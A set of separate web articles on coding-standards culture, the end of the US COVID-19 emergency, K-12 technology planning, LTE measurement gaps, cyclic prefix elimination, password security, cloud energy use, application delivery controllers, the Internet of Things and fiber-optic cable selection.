From onboarding to daily stand-ups, emphasize the importance of coding standards. Just as motifs are repeated throughout a symphony to reinforce thematic elements, repeat your commitment to standards to embed them in your team’s psyche.
5.3. Mentorship Programs
Pair junior developers with seasoned mentors, much like apprentices with maestros. These relationships can provide ongoing support, guidance, and feedback, crucial for the development of a junior’s coding finesse.
5.5. Continuous Improvement
Encourage a mindset of continuous learning and improvement. Hold workshops, attend seminars, and review the latest coding standards and practices. Like musicians who continuously adapt to new music styles and techniques, developers should evolve with the changing tech landscape.
5.6. Open Discussions
Foster an environment where juniors feel comfortable discussing their code openly, whether it’s questions about best practices or seeking advice on handling specific challenges. Think of it as a group critique session, where everyone learns from each other’s compositions and critiques.
By embracing these practices, you not only teach coding standards effectively but also build a vibrant culture of excellence and harmony in your development team. Remember, the goal is not just to play the notes right but to make the music feel right—to make the code not just functional but exceptional. | <urn:uuid:41d20b16-6256-4121-b4f7-5343c843ae4c> | CC-MAIN-2024-38 | https://networkencyclopedia.com/coding-standards-a-symphony-of-syntax/ | 2024-09-12T12:46:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00728.warc.gz | en | 0.906257 | 2,790 | 3.765625 | 4 |
What will the U.S. government's next steps be for COVID-19?
President Joe Biden announced on Jan. 30, 2023, that he intends to end both the national emergency and the public health emergency declarations related to COVID-19 on May 11, 2023.
Biden’s announcement came on the same day that the World Health Organization said it still considers the COVID-19 pandemic to be a public health emergency of international concern, or PHEIC, a status that is reassessed every three months. The WHO’s advisory committee noted that although the pandemic is at a turning point, “COVID-19 remains a dangerous infectious disease with the capacity to cause substantial damage to health and health systems.”
What does ending the emergency phase of the COVID-19 pandemic mean?
Ending the federal emergency reflects both a scientific and political judgment that the acute phase of the COVID-19 pandemic crisis has ended and that special federal resources are no longer needed to prevent disease transmission across borders.
In practical terms, it means that two declarations – the federal Public Health Emergency, first declared on Jan. 31, 2020, and the COVID-19 national emergency that President Donald Trump announced on March 13, 2020 – will be allowed to expire in May 2023.
Declaring those emergencies enabled the federal government to cut through a mountain of red tape, with the goal of responding to the pandemic more efficiently. For instance, the declarations allowed funds to be made available so that federal agencies could direct personnel, equipment, supplies and services to state and local governments wherever they were needed. In addition, the declarations made resources available to launch investigations into the “cause, treatment or prevention” of COVID-19 and to enter into contracts with other organizations to meet needs stemming from the emergency.
The emergency status also allowed the federal government to make health care more widely available by suspending many requirements for accessing Medicare, Medicaid and the Children’s Health Program. And they made it possible for people to receive free COVID-19 testing, treatment and vaccines and enabled Medicaid and Medicare to more easily cover telehealth services.
What policy changes will occur once the emergency is declared over?
The end to the federal emergency could substantially reduce the number of people insured under Medicaid. Before the pandemic, states required people to prove every year that they met income and other eligibility requirements.
In March 2020, Congress enacted a continuous enrollment provision in Medicaid that prevented states from removing anyone from their rolls during the pandemic. In a December 2022 appropriations bill, Congress passed a provision that will end continuous enrollment on March 31, 2023.
The Biden administration has defended this time frame as sufficient to ensure that “patients do not lose access to care unpredictably” and that state Medicaid budgets – which have been infused with emergency funds since 2020 – “don’t face a radical cliff.” But many people with Medicaid may be unaware of these changes until they actually lose their benefits.
Some states have already indicated that they will begin disenrolling members in April 2023 or require members to apply to be considered for renewal. This could result in between 5 million and 14 million people losing coverage.
People with Medicare do not have to worry about losing their benefits, since this program is age-based, not income-based. The array of telehealth services that Medicare began covering during the pandemic will continue to be covered through December 2023. Medicare coverage for many telehealth services could also be made permanent after this year.
The end of the emergency could additionally curb access to COVID-19 drugs, tests and vaccines. Federal emergency funding for free treatment or vaccination will end when the emergency status is lifted on May 11. If such programs are to continue, the cost will fall to state and local health agencies or insurance companies.
We are concerned that the withdrawal of federal emergency funds for vaccination may further slow the already sluggish uptake of boosters. As of Jan. 25, 2023, about 20% of the population ages 5 and up and only 40.1% of those 65 and older – who are at the highest risk of death from COVID-19 – had received an updated bivalent booster dose. Once the emergency ends, measures that allowed a broad array of health providers – from pharmacist interns to retired nurses and even veterinarians – to administer vaccines will expire, which could lead to decreased access to vaccination in many parts of the U.S.
What does this mean for the status of the pandemic?
A pandemic declaration represents an assessment that human transmission of a disease, whether well known or novel, is “extraordinary,” that it constitutes a public health risk to two or more states and that controlling it requires an international response.
At some point the WHO will end its pandemic declaration. On Jan. 30, 2023, World Health Organization Director-General Tedros Adhanom Ghebreyesus described the pandemic as being “at a transition point.” But the WHO’s assessment is that the risks are still considerable. Ghebreyesus noted that COVID-19 continues to strain health care systems, exacerbate health care workforce shortages and exceed surveillance system capacities.
The U.S. remains one of the global COVID-19 hot spots. With more than 3,500 hospitalizations per week on average in January 2023, and 3,452 deaths per week as of early February 2023, the U.S. has among the highest deaths per capita in the world.
How does the Biden administration’s stance differ from the WHO’s position?
In some ways they are very similar. The WHO is looking at the pandemic from a global perspective while the Biden administration is examining it from a national perspective. The WHO’s stance reflects the assessment that the world is not sufficiently vaccinated, that health care systems remain vulnerable and that unchecked disease transmission in some parts of the world should remain a source of international concern and attention.
China’s massive outbreak after the lifting of its zero-COVID policy in early December 2022 has received a great deal of media attention. But less noted is the fact that vaccination rates across African nations average 40%, and that vaccination rates are very low in countries that are experiencing conflict, such as Syria, where only 15% of the population has received any COVID-19 vaccine.
The WHO’s continuation of the global pandemic status signals that there is more international coordination and work to be done. In contrast, the Biden administration is making a social and political judgment that it is time to wind down the federal role.
Biden’s order will not affect state-level or local-level emergency declarations. These declarations have allowed states to allocate resources to meet pandemic needs and have included provisions allowing them to respond to surges in COVID-19 cases by allowing out-of-state physicians and other health care providers to practice in person and through telehealth.
Almost all U.S. states, however, have ended their own public health emergency declarations. Eight states – California, Colorado, Delaware, Georgia, Illinois, New Mexico, Rhode Island and Texas – still have emergency declarations in effect, but all of them will expire by the end of February 2023 unless renewed.
While some states may choose to make permanent some COVID-era emergency standards, such as looser restrictions on telemedicine or out-of-state health providers, it could be a long time before either politicians or the public regain an appetite for any emergency orders directly related to COVID-19. | <urn:uuid:cb08664e-4534-42cb-88c1-09d82808b7c1> | CC-MAIN-2024-38 | https://www.nextgov.com/ideas/2023/02/bidens-plan-ending-emergency-declaration-covid-19-signals-pivotal-point-pandemic4-questions-answered/382608/?oref=ng-next-story | 2024-09-13T17:24:51Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00628.warc.gz | en | 0.959801 | 1,571 | 2.8125 | 3 |
Technology Planning: Creating a Digital K-12 Environment
The Process of Improving the Digital Learning Process
As K-12 schools prepare to enhance their digital learning environments, educators must take a comprehensive approach toward ensuring the right infrastructure, technology and training components are in place every step of the way.
A Guide to Mapping Your Future of Learning Journey
Start at the beginning. Get clarity around your existing education landscape and what it will take to modernize your learning platforms.
- Envision your plan for the school and the district.
- Assess specialized hardware and audio/video equipment requirements.
- Identify tools and resources needed to achieve future-ready learning and the infrastructure to support them.
- Determine a standard format for content across all classes.
- Engage your online content development team to make learning more effective.
- Structure the learning program so students are focused on the task at hand.
- Conduct assessments to determine rollout readiness.
Pre- and During Implementation
Formulate a rollout plan. Be sure all departments and district entities are involved.
- Clarify usage policies and restrictions.
- Identify process owners and processes to ensure alignment to rollout readiness.
- Develop and implement a communication plan to all stakeholders (why, how, what).
- Provide professional learning aligned to rollout readiness (administration, staff, students, parents).
- Determine security requirements (e.g., authentication, authorization) and SAML integration.
- Assess from a cost perspective whether servers need to be up and running all the time.
Now that your solution is in place, be sure your K-12 institution is ready to address any current changes or issues.
- Consider managed services.
- Measure ROI through analytics (device, usage, break/fix, implementation goals).
- Follow up on all processes to ensure success/improvement areas are identified.
- Survey students and administrators on what can be improved.
- Optimize to create greater value for the end user (price/performance).
- Maintain a DevOps-based mindset for updating the course content.
IT Asset Management
Adopting education technology isn’t a linear process. It’s a cyclical endeavor that requires educators to prepare for future upgrades, technology advancements and more.
- Ensure you have a documented process for device replacement or device additions.
- Consider buyback options for older hardware.
- Determine and act upon the optimum hardware refresh cycle for your technology platform.
- Be prepared to address emerging technology developments around augmented reality, virtual reality and the Internet of Things.
Next step: Give us a call to get started on your journey.
You May Also Like | <urn:uuid:e58d4796-c8a7-44e8-9959-6a0f72581eca> | CC-MAIN-2024-38 | https://www.cdwg.com/content/cdwg/en/articles/digitalworkspace/technology-planning-creating-a-digital-k-12-environment.html | 2024-09-16T06:51:41Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00428.warc.gz | en | 0.89277 | 555 | 3.015625 | 3 |
During RRC_CONNECTED mode, if the eNodeB decides that the UE needs to perform LTE inter-frequency and inter-RAT monitoring activities, it will provide the UE with a measurement configuration which includes a monitoring gap pattern sequence.
Similar mechanisms exist in UMTS (known as ‘Compressed Mode gaps’ and ‘FACH Measurement Occasions’ depending on the state and capabilities of the UE) and in GSM (known as GSM Idle frames in GSM Dedicated and Packet Transfer Mode states).
During the monitoring gaps, UE reception and transmission activities with the serving cell are interrupted.
The Main Reasons for Using Monitoring Gap Patterns Are as Follows:
• The same LTE receiver can be used both to perform both intra-frequency monitoring and to receive data when there is no transmission gap.
• The presence of monitoring gaps allows the design of UEs with a single, reconfigurable receiver. A reconfigurable receiver can be used to receive data and to perform inter- RAT activity, but typically not simultaneously.
• Even if a UE has multiple receivers to perform inter-RAT monitoring activity (e.g. one LTE receiver, one UMTS receiver and one GSM receiver) there are some band configurations for which monitoring gaps are still required in the uplink direction.
In particular, these are useful when the uplink carrier used for transmission is immediately adjacent to the frequency band which the UE needs to monitor.
There is always a significant power difference between the inter-RAT signal to be measured and the signal transmitted by the UE.
The amount of receive filtering which can be provided, within the cost and size limitations of a UE, is not sufficient to filter out the transmitted signal at the input of the receiver front end, so the transmit signal leaks into the receiver band creating interference which saturates the radio front end stages.
This interference desensitizes the radio receiver which is being used to detect inter-RAT cells. Rather than address each scenario (i.e. each pair of frequency bands) with a specific solution, uplink gaps in LTE are configured in the same way for all scenarios.
LTE monitoring gap patterns contain gaps every N LTE frames6 (i.e., the gap periodicity is the multiple of 10 ms) with a 6 ms duration for these gaps.
A single monitoring gap pattern is used to monitor all possible RATs (inter-frequency LTE FDD and TDD, UMTS FDD, GSM, TD-SCDMA, CDMA2000 1x and CDMA2000 HRPD).
Different gap periodicities are used to trade off between UE inter-frequency and inter- RAT monitoring performance, UE data throughput and efficient utilization of transmission resources.
In general, cell identification performance increases as the monitoring gap density increases, while the ability of the UE to transmit and receive data decreases as the monitoring gap density increases.
Most RATs (LTE, UMTS FDD, TD-SCDMA, CDMA2000) broadcast sufficient pilot and synchronization information to enable a UE to synchronize and perform measurements within a useful period slightly in excess of 5 ms. This is because most RATs transmit downlink synchronization signals with a periodicity no lower than 5 ms.
For Example, in LTE the PSS and SSS symbols are transmitted every 5 ms. Therefore a 6 ms gap provides sufficient additional headroom to retune the receiver to the inter-frequency LTE carrier and back to the serving LTE carrier and still to cope with the worst-case relative alignment between the gap and the cell to be identified.
3GPP Technical Specification 36.133, ‘Evolved Universal Terrestrial Radio Access (E-UTRA); Requirements for Support of Radio Resource Management(Release 8)’, www.3gpp.org.
3GPP Technical Specification 25.213, ‘Technical Specification Group Radio Access Network; Spreading and Modulation (FDD)’, www.3gpp.org.
3GPP Technical Specification 36.214, ‘Evolved Universal Terrestrial Radio Access (E-UTRA); Physical Layer – Measurements (Release 8)’, www.3gpp.org. | <urn:uuid:1a3ec7ac-b69d-4455-ae06-a83c404cf6de> | CC-MAIN-2024-38 | https://moniem-tech.com/2018/05/18/111/ | 2024-09-17T11:38:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00328.warc.gz | en | 0.904997 | 879 | 2.6875 | 3 |
Sharing Bandwidth: Cyclic Prefix Elimination
Unfortunately, there is only so much over-the-air wireless bandwidth, and it must be shared between a lot of folks. And the situation is not getting any better. While you can usually run another wire or fiber optic cable between two locations to get more bandwidth, if you have a wireless application you must share this scarce resource.
New applications, such as IoT (internet of things), 3-D Virtual Reality headsets, and new cell phone applications are demanding more and more bandwidth. With cable subscribers watching video on portable devices, such as tablets and phones, interference problems (such as frozen pictures and tiling) are becoming more frequent problems. More than half of customer complaints are caused by wireless problems, and the most common problem is Wi-Fi interference, frequently from a neighbor’s service.
Solutions to the Problem
- One solution to the problem of more bandwidth is to use cellular technology and make the cell size smaller. Have you ever observed that out in the country cell towers are tall for a long reach? But in crowded cities, they are much closer to the ground, and the antennas are pointed downward. This is to reduce cell diameter in highly populated areas, allowing bandwidth reuse in non-overlapping cells. Transmitted power is also reduced for small cells to limit signal reach, thus reducing interference. However, large numbers of cell sites are expensive to deploy and maintain - and the bandwidth itself can be expensive. In the latest FCC bandwidth auction, the 600MHz band in the United States was sold for almost $20 billion!
- Other techniques to increase bandwidth include steerable beams and a technique called MIMO (multiple input, multiple output). This is a system for reusing the spectrum with more unique signals in the same air, by transmitting 2 or more signals on different antennas which are physically separated. At a receive site, sophisticated signal processing, using 2 or more antennas, separates the two signals.
CableLabs Innovation: Cyclic Prefix Elimination
CableLabs researchers are constantly looking for efficiency improvements, and they have found one way to improve wireless signals to make them use less bandwidth. This method, called “OFDM CP Elimination” (the full mouthful is Orthogonal Frequency Division Multiplex Cyclic Prefix Elimination!), allows the data to be sent in less time, increasing the resolution of pictures, and reducing the time for screen updates. Their method eliminates an overhead called a “Cyclic Prefix”, thereby improving efficiency by up to 25%. A side benefit of finishing transmissions earlier is increasing battery life for handheld devices.
Interested in a deep dive into cyclic prefix elimination? Check out my video on the subject, my blog post "Getting Rid of a Big Communications Tax on OFDM Transmissions" and my technical paper in the December issue of the SCTE ISBE Journal titled "OFDM Cyclic Prefix Elimination."
CableLabs innovates to help our member companies provide better services to their customer including higher data rates, higher reliability and lower latency. Subscribe to our blog to find out more. | <urn:uuid:408c12ea-2f68-44b0-b68f-323205fdafc8> | CC-MAIN-2024-38 | https://www.cablelabs.com/blog/sharing-bandwidth-cyclic-prefix-elimination | 2024-09-18T19:12:41Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00228.warc.gz | en | 0.943359 | 644 | 2.84375 | 3 |
The Dangers of Weak Passwords
When it comes to security, your password is the first barrier against unauthorised access. However, relying on weak password practices is like leaving the front door unlocked, inviting trouble. Just as a flimsy lock on a gate makes it easy for intruders to enter, an easily guessed or reused password opens the door for cybercriminals to exploit, putting your entire organisation at risk. No one is exempt from this threat.
Why Unique Passwords Matter
In a 2024 a survey on password security, 30% of users reported experiencing a breach due to weak passwords. Over half (52.9%) admitted to sharing their passwords with colleagues, friends, or family, and nearly 46% confessed to reusing passwords across different platforms.
These aren’t just mistakes made by the general public. Even IT professionals fall into these traps. In 2022, it was revealed that 53% of IT experts share passwords via email, 41% do so over chat, and 31% through face-to-face conversations.
These figures highlight the grave risks associated with poor password practices. The potential consequences range from data breaches to blackmail involving sensitive personal information, and substantial financial losses. In cybersecurity, the question isn’t “if” an attack will happen, but “when”—and being unprepared can be costly.
The 2023 Verizon Data Breach Investigations Report emphasised that human error remains the leading cause of security incidents, underscoring the need for robust cybersecurity education. Effective cybersecurity begins with strong passwords and the reinforcement of good password habits.
How Hackers Exploit Passwords
There are two primary methods hackers use to compromise passwords: brute force attacks and credential stuffing, both of which pose significant risks.
Brute Force Attacks:
- Hackers try all possible password combinations to guess your password.
- They often start with common passwords or personal details.
- Simple passwords make their job easier.
- One data leak can lead to many security breaches.
- Hackers use stolen usernames and passwords from one website to try and log into others.
- If you reuse passwords across sites, this method can compromise multiple accounts.
In addition to these methods, hackers often use social engineering and phishing techniques to steal passwords. While it’s challenging to ensure that everyone in an organisation is always vigilant against these tactics, utilising a reliable password manager and practicing good password hygiene can greatly reduce the risk.
The Fallout of Poor Password Management
The consequences of poor password management are severe and far-reaching. A compromised password can lead to financial losses, unauthorised access to sensitive data, and damage to personal or organisational reputations. Cybercriminals with access to private information will exploit it for their own malicious purposes.
Importance of Complex Passwords:
- Use a mix of uppercase and lowercase letters, numbers, and special characters.
- Avoid using personal information like names or dates.
- The best passwords are random strings of characters without any personal connection.
Using Passphrases for Added Security:
- Passphrases are easier to remember but harder to crack than simple passwords.
- Example: “BlueSkyOceanBreeze” is stronger than “BlueSky.”
- Enhance security by swapping letters with numbers or symbols, like “Blu3SkY0c3@nBr33z3.”
- Choose passphrases that are memorable to you but not linked to personal details.
Avoid Common Password Mistakes:
- Don’t use easy patterns like “123456,” obvious words like “password,” or important dates.
- Avoid using personal info that’s easy to find online, like your address or birthdate.
Dangers of Reusing Passwords:
- Reusing passwords across sites is risky; one breach can lead to multiple compromised accounts.
- Always use unique passwords for each account to stay secure.
Benefits of Password Managers:
- Password managers store your complex passwords securely.
- They help you maintain strong, unique passwords without needing to remember each one.
Enhancing Security with Multi-Factor Authentication (MFA):
- MFA adds another layer of security by requiring more than one form of verification.
Securing Your Passwords with a Password Manager
The Advantages of a Password Manager
A password manager is a highly effective tool for managing identity and access. It stores your passwords in an encrypted vault, simplifying the process of maintaining strong password practices.
With most services requiring complex passwords, it’s easy to forget them. We all know someone who constantly uses the “Forgot your password?” option. A password manager eliminates this issue, allowing you to focus on your tasks without worrying about remembering passwords.
Selecting the Right Password Manager
Choosing the right password manager is crucial. There are various types, each with its own advantages and disadvantages. Some store passwords locally on your device, while others use cloud storage, allowing access from multiple devices even if one is lost.
While many free password managers are available, they often lack important features like multi-factor authentication (MFA) and may not be updated regularly.
Tips for Managing and Organising Passwords
Everyone has a role to play in managing and organising passwords, but a password manager makes the job easier.
Start by maintaining good password hygiene: use complex passwords and passphrases, change them regularly, and never reuse them. Avoid sharing passwords with others.
When choosing a password manager, look for features such as MFA, a random password generator, and an encrypted vault that only you can access. Additional tools, like autofill for forms or mobile app PIN unlock and fingerprint login, can also be useful. | <urn:uuid:700b025b-0eab-46f5-9dec-b1306e8acd28> | CC-MAIN-2024-38 | https://cobweb.com/content-hub/tag/bad-passwords/ | 2024-09-13T20:48:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00728.warc.gz | en | 0.921434 | 1,200 | 3 | 3 |
Considerable focus goes into reducing greenhouse emissions from vehicles, manufacturing, and even agriculture – as it should. But truly addressing climate change will require concerted efforts in every industry. While digital technologies are often the ‘greener’ way to do things, every source needs to be examined for opportunities to decrease greenhouse gas production. This includes approximately 17.5% of emissions from the energy used to light, heat, cool, and electrify buildings. Around 7% of those emissions are from commercial buildings, the category that includes data centers.
Estimates are that about 2% of total greenhouse gas emissions can be attributed to data centers. While this is a small percentage of the whole, it’s not insignificant. And every bit counts. There are tangible opportunities for increasing energy efficiency in data storage and transmission. Implementing these measures now will help mitigate the impact of increased data use in the future.
This Earth Day is a chance for people in every industry to understand their impact on the global climate and identify actions they can take to make real change. While livestock farmers examine ways they can reduce harmful greenhouse gases, those of us in the tech industry can focus on our server farms.
Efficiencies built into modern data centers
According to the U.S. International Trade Commission, there are nearly 8,000 data centers globally, with about 33% of them located in the United States. While you’re unlikely to encounter greenhouse-emitting animals roaming around, data centers nonetheless have a reputation for being energy hogs. Servers require considerable amounts of energy, as do lights, fans, monitors, security, and cooling systems. Much of this energy still results in the production of greenhouse gases.
In the past decade, human energy has been flowing into innovations for decreasing the climate impact of data storage and transmission. In fact, according to the International Energy Agency, the industry’s share of global electricity use has hardly changed since 2010, even though the number of internet users has doubled and global internet traffic has increased 15-fold. This comes from the use of more efficient hardware as well as green innovations in buildings and cooling systems.
But most experts believe that continued high demand in the technology sector will fuel growth that will eventually outstrip efficiency gains. So the quest for lower energy consumption continues, especially as companies that are still hosting in-house systems are moving to the cloud.
Migrating to the cloud decreases carbon footprint
On the face of it, it would seem that energy is energy, but according to a report by 451 Research, moving applications to the cloud could compress the energy footprint of a workload to one-fifth compared to running the same workload on-premises. In addition to the efficiencies of shared infrastructure, data centers use virtualization software that enables operators to deliver greater work output with fewer servers.
Tackling climate change in our global data infrastructure is an all-hands opportunity. As individual companies continue moving to the cloud, we can increase efficiency workload-by-workload. Meanwhile, the largest cloud providers, including AWS and Microsoft, are making bold commitments to address their climate impact. In 2020, Microsoft announced plans to be carbon negative by 2030. And they plan to shift to 100% renewable energy by 2025 for powering their data centers, buildings, and campuses.
This Earth Day, the world is recognizing that it’s not enough to simply try harder when it comes to addressing climate change. From the farms that feed us to the server farms that fuel our data economy, it’s time to move together toward zero greenhouse gas emissions. BitTitan is proud to do our part by helping companies increase efficiency by migrating to the cloud. With MigrationWiz, every day can be Earth Day. | <urn:uuid:76c45c8f-735b-4c66-b129-d951a52003f1> | CC-MAIN-2024-38 | https://get.bittitan.com/blog/from-the-experts/from-animal-farms-to-server-farms-addressing-technologys-climate-impacts/ | 2024-09-13T22:02:15Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00728.warc.gz | en | 0.946891 | 760 | 3.203125 | 3 |
Cloud Computing Patterns, Mechanisms > Mechanisms > A - B > Application Delivery Controller
Application Delivery Controller
The application delivery controller (ADC) is used to combine security functions in one device, including application layer security, distributed denial-of-service (DDoS) protection, advanced routing strategies, and server health monitoring combined with basic application acceleration and server load balancing. The ADC is typically placed in a data center between the firewall and one or more application servers in the DMZ.
An ADC installed in a data center DMZ.
The figure shows the concept of an ADC where a number of protection mechanisms are combined in a network device. ADCs are commonly used by high traffic websites as a reverse proxy to scale and accelerate Web applications by front-ending the load from the servers. ADCs can perform TLS offloading, compression, dynamic site acceleration (DSA), front-end optimization (FEO) and mobile content acceleration.
ADCs support application operation and can look deeper into the specific traffic and make more intelligent decisions. They can optimize application server performance by offloading many compute-intensive tasks that would otherwise load the server CPUs needed to deliver applications to users. An ADC can transform or rewrite the content of the client request, including the response from the servers. | <urn:uuid:f955450f-1144-4b1b-913b-6c933537faf3> | CC-MAIN-2024-38 | https://patterns.arcitura.com/cloud-computing-patterns/mechanisms/application_delivery_controller | 2024-09-18T20:30:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00328.warc.gz | en | 0.893708 | 258 | 2.65625 | 3 |
Pardon my skepticism, but it seems like IoT is just another catchy phrase to describe something that has been around for a while.
Coined in 1999 by Kevin Ashton, IoT refers to the connection of devices like house- hold appliances (washers, dishwashers), transport vehicles (automated carts and vehicles), sophisticated equipment (heart-monitoring implants), etc. to other devices or users through the Internet. Basically, these items operate autonomously, but can report on their status and can permit adjustment, intervention, and remote control while performing their programmed duties.
Wikipedia describes IoT as “…the network of physical objects or “things” embedded with electronics, software, sensors and network connectivity, which enables these objects to collect and exchange data… resulting in improved efficiency, accuracy, and economic benefit. Each thing is uniquely identifiable… but is able to interoperate within the existing Internet infrastructure.”
There are many older IoT-type applications already in use:
- A Coke machine reported on quantities and temperature. (This was first demonstrated in 1982 at Carnegie Mellon University.)
- Home-based equipment, from your shades to your alarm system, can be controlled from your smartphone (since the 1990s).
What exactly is new? Growth!
These early attempts were focused primarily on single applications for a limited audience; they basically feed unprocessed data forward or permitted single-user control. Current IoT efforts dream of utilizing big-data processing to unite information and disparate devices with a large population of users.
New and useful applications will arise and be connected, linking us to a brand new world. And, it will not be just embedded electronics in stationary devices, but also wearables (watches, health monitors, wireless cameras, etc.) and drive-ables (from vehicles with embedded computers to Google’s driverless cars) making up the IoT population.
The expectation is somewhere between 26 billion (Gartner says the Internet of Things will be 26 billion by 2020 by Gartner, Inc.) to 30 billion (More than 30 Billion devices will connect wirelessly to the Internet of Everything by ABI Research) IoT devices will be functional by 2020. Interestingly, the USA, at 24.9 online IoT devices per 100 inhabitants, currently lags behind South Korea (37.9), Denmark (32.7), and Switzerland (29.0) according to the OECD’s Digital Economy Outlook 2015, Chapter 6; Figure 6.6.
With tremendous growth comes great and, sometimes, undesired consequences. Issues being discussed and addressed include:
- Data will explode, requiring greater storage, access, and processing
- Internet bandwidth will be consumed and, at times, found lacking
- Wireless networks should expand and improve
- Security may be compromised
- Legal challenges shall multiply
- Electricity use will change
- Privacy will be invaded
Data will explode, requiring greater storage, access, and processing
Where is all of this data going to be stored? Who will have access and how will it be enabled? What processing capabilities will be required to make sense of it all? After its useful life, how will data be removed (or at least archived)?
Internet bandwidth will be consumed and, at times, found lacking
Seems like bandwidth is already constrained in my home; will I need to unplug my refrigerator to watch Netflix? Will there be enough bandwidth not only inside the home or office, but also connecting the home/office to the Internet? Will Internet Service Providers be able to handle this coming surge in demand?
Wireless networks should expand and improve
Things don’t connect unless they are wired or have available wireless access: Will wireless networks be there when they are needed? Will they be able to provide sufficient bandwidth and coverage areas? Who will own them?
Security may be compromised
How will you safely authenticate devices against other devices and against multiple users? Can these devices be patched and/or updated in a secure and consistent manner? What if you purchase a smartHome and the previous owner does not release the smart technology; will you need to replace these items, or will there be a master override? (Marilyn Cohodas comments on some of these issues in her article: “4 IoT Cybersecurity Issues You Never Thought About” in the 9/24/2015 issue of InformationWeek DARKReading.)
Also, a July 2014 study by Hewlett-Packard found that six of 10 popular IoT devices surveyed were vulnerable to significant security issues and that seven of these devices used unencrypted network services. (See the article: “Popular Internet of Things devices are not Secure” by Lucian Constantin in the 7/30/2014 edition of ComputerWorld.)
Legal challenges shall multiply
What if your home-based device sent forth information you agreed to provide, but other family members of visiting friends did not wish to provide? Who is liable when this information ends up in the wrong hands?
Please review “Top 5 Legal Issues in the Internet of Things, Part 1: Data Security & Privacy” by Brian Wassom at Wassom.com.
Electricity use will change
Unless unplugged, electronics-enabled devices are connected 24×7, consuming electricity the entire time. Multiply this usage against billions of devices and our power needs and power consumption may change dramatically.
One promising note: Energy use will be monitored closely, with the likely result that optimization will occur, balancing power generation with energy use (and even decreasing energy use in some situations).
Privacy will be invaded
When my blender rats me out and tells the world that I made a chocolate shake after midnight, what will manufacturers conclude about me and my habits and who will they tell? Also, can I trust these manufacturers to use my household data wisely and keep it secure? Do standards exist to protect me from snooping?
See Brian Wassom’s article: “The Internet of Things that Eavesdrop and Invade Privacy” on 7/30/2015 at Wassom.com.
Evolving regulations and standards
Fortunately, the US Federal Government is addressing these areas with new insights and rulings:
- The Senate introduced Res. 110 in March of 2015 and the House followed with H. Res. 195 in April; both recognize the need for national-level development of an IoT strategy, best practices, and communications.
- FTC urges Best Practices to Address Consumer Privacy and Security Risks.
- DHS is seeking best ideas on “…how we can mobilize and repurpose cutting-edge smart technologies to strengthen the safety and security of our nation.”
The IoT is here now; it will get better with time, but make sure you know the risks and potential consequences when you enable it in your home or office. | <urn:uuid:27fb4186-5c1e-41cc-8d11-2310491b905b> | CC-MAIN-2024-38 | https://www.bryley.com/tag/iot/ | 2024-09-09T06:12:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00328.warc.gz | en | 0.923818 | 1,394 | 2.96875 | 3 |
With the advances of the information age, a great amount of people specialized in the field of network communication begins to attach great importance to the selection of fiber optic cables. From data and voice to security and videoconferencing, plenty of contemporary cable infrastructure services depend heavily on fiber optics to transmit information of farther distance at a higher speed, which makes fiber optics a standard component in daily communication nowadays. Fiber optics are considered to be a desirable cable medium because of its immunity to electromagnetic interference (EMI) and radio frequency interference (RFI) , not to mention its bandwidth that helps to meet the increased capacity demand, and its reliable reputation to ensure worry-free maintenance. This article is going to focus primarily on some essential component in fiber optic installation and provide some insight into selecting the right fiber optic cable.
Fiber optic cable basically can be used in a wide variety of applications, ranging from small office LANs, data centers to inter-continental communication links. Moreover, its ability to transport signals for significant distances also contributes to its popularity in most networks, whether they are local, wide area or metropolitan. In fact, fiber optic cable is now running down many residential streets and brought directly to the house. Thus, choosing the appropriate fiber optic cable is extremely important for any installation.
It is known to all that the selection concerning the right type of fiber should be based on the immediate application since it varies in different circumstances. Besides, installers should also consider upcoming applications and capacity needs. Future bandwidth demands, transmission distances, applications, and network architecture influence fiber selection just as much as current needs. Therefore, a careful assessment of potential network usage will help avoid the costs of preventable upgrades.
First and foremost, on selecting the right type of fiber, one should decide the mode of fiber needed. The mode of a fiber cable describes how light beams travel on the inside of the fiber cables themselves. Since the two modes aren’t compatible with each other and you can’t substitute one for the other, it is important to make the right choice.
Single-mode fiber optic cable uses a single strand of glass fiber for a single ray of light transmission, which can accommodate further distances and offer virtually unlimited bandwidth. Single-mode has the capacity to carry a signal for miles, making it an ideal option for telephone and cable television providers. And it is also usually employed in campus and metropolitan networks. Single-mode fiber requires laser technology for sending and receiving data, and the high-powered lasers transmit data at greater distances than the light used with multimode fiber.
Multimode fiber optic fiber, as the name indicates, allows the signal to travel in multiple modes, or pathways, along the inside of the glass strand or core. Multimode fiber optic cable is generally adopted in applications involving shorter distances like data center connections. Multimode fiber optic cable transmits Gigabit Ethernet up to 550 m, although it can’t compete with single-mode fiber optic cable in terms of transmission distance, multimode fiber cable is still proved to be a cost-efficient and economical solution.
Connections play an essential role in keeping the information flowing from cable to cable or cable to device. There are lots of connector styles on the market including LC, FC, MT-RJ, ST and SC. There are also MPO/MTP style connectors that will accommodate up to 12 strands of fiber and take up far less space than other connectors. Among them, manufacturers and distributors are more likely to have equipment to accommodate ST and SC style connectors than any other connector style. Especially the SC connectors, with better performance against loss, more efficient installation and easier maintenance, has earned its place in today’s networking applications. As for those data center managers who attach more importance to space-saving, the LC connector is a more ideal option. These connectors offer even lower loss in a smaller form factor and provide higher performance and greater fiber density.
